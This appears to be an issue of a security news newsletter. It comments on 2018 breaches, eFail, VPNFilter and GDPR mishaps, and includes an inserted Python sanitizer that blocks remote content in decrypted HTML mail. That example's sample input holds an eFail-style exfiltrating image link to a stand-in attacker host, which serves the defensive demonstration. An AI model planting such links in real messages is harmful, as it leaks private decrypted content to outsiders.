CyberWeekly - The first
Welcome to CyberWeekly, a weekly roundup of news, articles, long form blog posts and various other miscellania that interests your author, Michael Brunton-Spall.
Replies to this email will come straight to me, so just hit reply to send me feedback, comments or links or tweet it at me @bruntonspall.
Weekly Threat Report 18th May 2018 - NCSC Site
"A security researcher allegedly gained access to the development environment because both the username and password were set to “admin”, which was most likely the default setting for the environment." If you have admin users, you shouldn’t have a single user called admin. It implies shared credentials and a lack of good role based access control.
Teen phone monitoring app leaked thousands of user passwords | ZDNet The database stores the parent's email address associated with TeenSafe, as well as their corresponding child's Apple ID email address. “The data contains the plaintext passwords for the child's Apple ID. Because the app requires that two-factor authentication is turned off”. Note this was not a “traditional database” but a Celery queue according to the screenshots. Your message queue must not carry plaintext credentials any more than your database storage should. Additionally, services that require 2FA to be turned off are decidedly worrying.
Here's How eFail Attack Works Against PGP and S/MIME Encrypted Emails This is a good description of eFail. If the encrypted content is decrypted and the resulting HTML includes an image link with that content in the URL, the attacker gets the content.
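The client-side mitigation for the image-link variant described above, as an added example that is not code from the newsletter or from the eFail researchers: a filter a mail client could run over a decrypted HTML part before rendering it, dropping every reference that would fetch from the network while leaving cid: and data: references alone. The hosts attacker.example and evil.example and the sample body are constructed for the example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

FETCHING_ATTRS = {"src", "srcset", "background", "poster", "data"}  # load on render
REMOTE_SCHEMES = {"http", "https", "ftp"}

def is_remote(url):
    """True if loading this URL would leave the machine (also //host forms)."""
    return urlparse(url).scheme.lower() in REMOTE_SCHEMES or url.lstrip().startswith("//")

class RemoteContentBlocker(HTMLParser):
    """Re-emit HTML minus automatic remote fetches; stripped values go to ``blocked``."""
    def __init__(self):
        super().__init__()  # convert_charrefs=True: text arrives unescaped
        self.out, self.blocked, self._in_style = [], [], False
    def _fetches(self, tag, name, v):
        # src-like attributes, <link href> and inline style url(...) all trigger loads
        src_like = name in FETCHING_ATTRS or (tag, name) == ("link", "href")
        return (src_like and is_remote(v)) or (name == "style" and "url(" in v.lower())
    def _clean(self, tag, attrs):
        bad = [(n, v) for n, v in attrs if self._fetches(tag, n, v or "")]
        self.blocked += [v for _, v in bad]
        return [a for a in attrs if a not in bad]
    def _emit(self, tag, attrs, close):
        parts = [f'{n}="{escape(v)}"' if v is not None else n for n, v in self._clean(tag, attrs)]
        self.out.append("<" + " ".join([tag] + parts) + close + ">")
    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        self._emit(tag, attrs, "")
    def handle_startendtag(self, tag, attrs):
        self._emit(tag, attrs, "/")
    def handle_endtag(self, tag):
        self._in_style = False
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        # <style> bodies can carry url(...) loads: drop them; re-escape all other text
        self.out.append("" if self._in_style else escape(data, quote=False))

def sanitize_decrypted_html(html):
    """Return (safe_html, blocked_urls) for one decrypted HTML mail part."""
    p = RemoteContentBlocker()
    p.feed(html)
    p.close()
    return "".join(p.out), p.blocked
# Constructed sample: a decrypted body into which an exfiltrating <img> was spliced.
SAMPLE = ('<p>Meeting at 3pm.</p><img src="https://attacker.example/x.png?Meeting%20at%203pm" alt=""/>'
          '<img src="cid:logo@local"/><div style="background:url(//evil.example/t.gif)">hi</div>')
if __name__ == "__main__":
    print(sanitize_decrypted_html(SAMPLE))
```

The blocked list is what a client should surface as a "remote content blocked" notice and log, since a decrypted message that tries to load from an unknown host is itself a signal worth recording.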
Risk Acceptance 101: What Happens When Security Needs Go Unfunded? “The only way to address these challenges is to make sure security needs are funded when and where possible, as soon as possible.” While security is treated as buying magical black boxes and investing in cool-sounding technologies, this will never work. Until CISOs realise that they must be enablers of the business rather than the department of no, we won't see funding fixed.
How I used a simple Google query to mine passwords from dozens of public Trello boards "Note: I used a Google dork query, sometimes referred to as a dork. It is a search string that uses advanced search operators to find information that is not readily available on a website" - while the linked article about Trello is interesting in its own right, knowing more about Google advanced queries (I dislike the term Dork) for things such as site search is valuable for using Google for security analysis.
Cisco's Talos Intelligence Group Blog: VPNFilter Looks like “an actor” is attacking a variety of routers, compromising them and maintaining that compromise to use later. This is an interesting behaviour to notice, mostly because it’s a threat that hasn’t properly manifested yet but implies a bad payoff coming.
[Since I wrote this originally, the US Government has taken over a command and control server to mitigate this to some degree]
Ghostery GDPR Email - Imgur Ghostery, the privacy-preserving plugin for browsers, has accidentally sent its batch emails about GDPR to registered users using the To field, revealing other customers' email addresses, which are of course personal details. I think this might be the first breach under GDPR that I've seen.
/via https://www.reddit.com/r/technology/comments/8m45k6/ghostery_have_exposed_everyones_email_address_in/
The GDPR hall of shame
Showing some of the worst or most interesting GDPR emails sent out this week.
Costly Cloud Breaches Putting Digital Transformation Strategies at Risk, Finds Kaspersky Lab "But this rise of ‘data on the go’ is presenting new security issues, with the most expensive incidents related to cloud environments and data protection. Two out of three of the most expensive cybersecurity incidents affecting SMBs are related to the cloud, where 3rd party hosted IT infrastructure failures bring an average $179K loss." -- For me, this definition of cloud is a little peculiar. Hosting your data with a third party has been the norm for decades, but when it was a systems integrator, we didn't consider it as big a risk. This just underlines to me that supplier selection is incredibly important for security people.
TV Advert for MI6
"Secretly, we're just like you" This is the first ever advert for SIS to be broadcast, and it aims to counter the myth that MI6 officers must be James Bond, which I assume affects their recruitment capabilities.
That's all for this week. See you next week.
Michael